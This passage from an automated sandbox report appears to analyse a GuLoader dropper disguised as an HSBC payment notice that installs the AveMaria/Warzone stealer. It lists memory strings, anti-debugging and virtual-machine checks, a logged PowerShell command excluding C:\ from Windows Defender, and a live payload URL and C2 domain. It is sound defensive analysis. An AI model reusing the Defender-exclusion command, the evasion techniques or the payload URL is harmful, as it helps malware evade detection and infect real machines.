              Source: HSBC Payment Advice.exe, 00000000.00000002.378371625.00000000021D0000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510641709.00000000033E0000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653629492.0000000002260000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.775353631.0000000001AD0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exe TID: 7136Thread sleep count: 60 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2868Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2504Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3055Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeSystem information queried: ModuleInformationJump to behavior
              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
              Source: images.exe, 0000001C.00000002.775353631.0000000001AD0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=
              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
              Source: images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
              Source: images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmpBinary or memory string: vmicvss
              Source: HSBC Payment Advice.exe, 0000000C.00000002.510641709.00000000033E0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://spuredge.com/warzone_JBBOxCEy72.bin
              Source: HSBC Payment Advice.exe, 0000000C.00000002.509564917.0000000001B1F000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
              Source: HSBC Payment Advice.exe, 00000000.00000002.378371625.00000000021D0000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510641709.00000000033E0000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653629492.0000000002260000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.775353631.0000000001AD0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
              Source: HSBC Payment Advice.exe, 0000000C.00000002.509564917.0000000001B1F000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWen-USnm
              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
              Source: HSBC Payment Advice.exe, 00000000.00000002.378578030.0000000002DAA000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000002.510758188.00000000034AA000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653856720.0000000002D6A000.00000004.00000001.sdmp, images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
              Source: images.exe, 0000001C.00000002.776069655.000000000348A000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat
              Source: HSBC Payment Advice.exe, 00000000.00000002.378371625.00000000021D0000.00000004.00000001.sdmp, images.exe, 00000015.00000002.653629492.0000000002260000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\mshtml.dll

              Anti Debugging:

              barindex
              Hides threads from debuggersShow sources
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\ProgramData\images.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\ProgramData\images.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\ProgramData\images.exeCode function: 28_2_017ABD0E mov eax, dword ptr fs:[00000030h]28_2_017ABD0E
              Source: C:\ProgramData\images.exeCode function: 28_2_017A8FAA mov eax, dword ptr fs:[00000030h]28_2_017A8FAA
              Source: C:\ProgramData\images.exeCode function: 28_2_017ADCC3 mov eax, dword ptr fs:[00000030h]28_2_017ADCC3
              Source: C:\ProgramData\images.exeCode function: 28_2_017AC8BB mov eax, dword ptr fs:[00000030h]28_2_017AC8BB
              Source: C:\ProgramData\images.exeCode function: 28_2_017AA3C5 LdrInitializeThunk,28_2_017AA3C5

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Adds a directory exclusion to Windows DefenderShow sources
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeProcess created: C:\Users\user\Desktop\HSBC Payment Advice.exe "C:\Users\user\Desktop\HSBC Payment Advice.exe" Jump to behavior
              Source: C:\ProgramData\images.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exeJump to behavior
              Source: images.exe, 0000001C.00000002.775689055.0000000002030000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
              Source: images.exe, 0000001C.00000002.775689055.0000000002030000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: images.exe, 0000001C.00000002.775689055.0000000002030000.00000002.00020000.sdmpBinary or memory string: Progman
              Source: images.exe, 0000001C.00000002.775689055.0000000002030000.00000002.00020000.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings:

              barindex
              Increases the number of concurrent connection per server for Internet ExplorerShow sources
              Source: C:\Users\user\Desktop\HSBC Payment Advice.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings MaxConnectionsPerServer 10Jump to behavior

              Stealing of Sensitive Information:

              barindex
              Yara detected Generic DropperShow sources
              Source: Yara matchFile source: Process Memory Space: HSBC Payment Advice.exe PID: 5816, type: MEMORYSTR
              Yara detected AveMaria stealerShow sources
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b2fab0.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              GuLoader behavior detectedShow sources
              Source: Initial fileSignature Results: GuLoader behavior
              Source: Yara matchFile source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: HSBC Payment Advice.exe PID: 5816, type: MEMORYSTR

              Remote Access Functionality:

              barindex
              Yara detected AveMaria stealerShow sources
              Source: Yara matchFile source: 12.3.HSBC Payment Advice.exe.1b2fab0.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection12Masquerading3Input Capture11Security Software Discovery41Remote ServicesInput Capture11Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationEndpoint Denial of Service1
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion221Security Account ManagerVirtualization/Sandbox Evasion221SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection12NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol213SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonHidden Users1Cached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 528768 Sample: HSBC Payment Advice.exe Startdate: 25/11/2021 Architecture: WINDOWS Score: 100 31 spuredge.com 2->31 33 barr2.ddns.net 2->33 45 Multi AV Scanner detection for domain / URL 2->45 47 Potential malicious icon found 2->47 49 Found malware configuration 2->49 51 17 other signatures 2->51 9 HSBC Payment Advice.exe 2->9         started        signatures3 process4 signatures5 57 Tries to detect Any.run 9->57 59 Hides threads from debuggers 9->59 12 HSBC Payment Advice.exe 4 11 9->12         started        process6 dnsIp7 35 spuredge.com 38.103.244.107, 443, 49784, 49823 FHLB-OFUS United States 12->35 27 C:\ProgramData\images.exe, PE32 12->27 dropped 29 C:\ProgramData\images.exe:Zone.Identifier, ASCII 12->29 dropped 61 Adds a directory exclusion to Windows Defender 12->61 63 Tries to detect Any.run 12->63 65 Increases the number of concurrent connection per server for Internet Explorer 12->65 67 2 other signatures 12->67 17 images.exe 12->17         started        20 powershell.exe 25 12->20         started        file8 signatures9 process10 signatures11 37 Multi AV Scanner detection for dropped file 17->37 39 Machine Learning detection for dropped file 17->39 41 Tries to detect Any.run 17->41 43 Hides threads from debuggers 17->43 22 images.exe 17->22         started        25 conhost.exe 20->25         started        process12 signatures13 53 Tries to detect Any.run 22->53 55 Hides threads from debuggers 22->55

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              HSBC Payment Advice.exe56%VirustotalBrowse
              HSBC Payment Advice.exe20%MetadefenderBrowse
              HSBC Payment Advice.exe49%ReversingLabsWin32.Downloader.GuLoader
              HSBC Payment Advice.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\ProgramData\images.exe100%Joe Sandbox ML
              C:\ProgramData\images.exe56%VirustotalBrowse
              C:\ProgramData\images.exe20%MetadefenderBrowse
              C:\ProgramData\images.exe49%ReversingLabsWin32.Downloader.GuLoader

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              12.0.HSBC Payment Advice.exe.400000.1.unpack100%AviraTR/Dropper.VB.GenDownload File
              12.0.HSBC Payment Advice.exe.400000.3.unpack100%AviraTR/Dropper.VB.GenDownload File
              28.0.images.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File
              12.0.HSBC Payment Advice.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File
              28.0.images.exe.400000.1.unpack100%AviraTR/Dropper.VB.GenDownload File
              0.0.HSBC Payment Advice.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File
              21.2.images.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File
              21.0.images.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File
              0.2.HSBC Payment Advice.exe.400000.0.unpack100%AviraTR/Dropper.VB.GenDownload File
              12.0.HSBC Payment Advice.exe.400000.2.unpack100%AviraTR/Dropper.VB.GenDownload File
              28.0.images.exe.400000.2.unpack100%AviraTR/Dropper.VB.GenDownload File
              28.0.images.exe.400000.3.unpack100%AviraTR/Dropper.VB.GenDownload File

              Domains

              SourceDetectionScannerLabelLink
              spuredge.com12%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://spuredge.com/warzone_JBBOxCEy72.bin0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              barr2.ddns.net
              		194.5.97.4
              		truetrue
                		unknown
                spuredge.com
                		38.103.244.107
                		truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://spuredge.com/warzone_JBBOxCEy72.bintrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://github.com/syohex/java-simple-mine-sweeperC:HSBC Payment Advice.exe, 0000000C.00000003.501661289.0000000001B82000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501830752.0000000001B99000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501858409.0000000001B2F000.00000004.00000001.sdmp, HSBC Payment Advice.exe, 0000000C.00000003.501798969.0000000001B99000.00000004.00000001.sdmpfalse
                  		high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  38.103.244.107
                  		spuredge.comUnited States
                  		40695FHLB-OFUStrue

                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:528768
                  Start date:25.11.2021
                  Start time:18:47:52
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 8m 33s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:HSBC Payment Advice.exe
                  Cookbook file name:default.jbs
